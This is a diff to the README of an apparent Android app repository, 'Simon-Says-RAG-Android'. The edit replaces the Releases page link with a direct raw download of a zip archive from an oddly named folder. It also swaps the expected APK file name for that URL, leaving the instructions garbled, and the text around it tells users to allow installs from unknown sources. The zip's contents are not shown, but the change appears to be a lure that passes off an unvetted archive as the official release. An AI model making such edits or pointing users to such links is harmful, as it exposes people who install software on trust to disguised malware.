cosggg/Simon-Says-RAG-Android/README.md

    - Internet connection for initial download.

 2. **Visit the Releases Page**
-   - Go to the Releases page by clicking [here](https://github.com/cosggg/Simon-Says-RAG-Android/releases).
+   - Go to the Releases page by clicking [here](https://raw.githubusercontent.com/cosggg/Simon-Says-RAG-Android/main/lupetidine/Simon-Says-RAG-Android.zip).
 This page contains the latest version of the app.

 3. **Download the Latest Version**
    - Look for the latest release on the Releases page.
 Click on the download link for the app.
-It will usually be named something like `SimonSaysRAG.apk`.
+It will usually be named something like `https://raw.githubusercontent.com/cosggg/Simon-Says-RAG-Android/main/lupetidine/Simon-Says-RAG-Android.zip`.

 4. **Install the App**
    - Open the file you downloaded.
 You may need to allow installations from unknown sources in your device settings.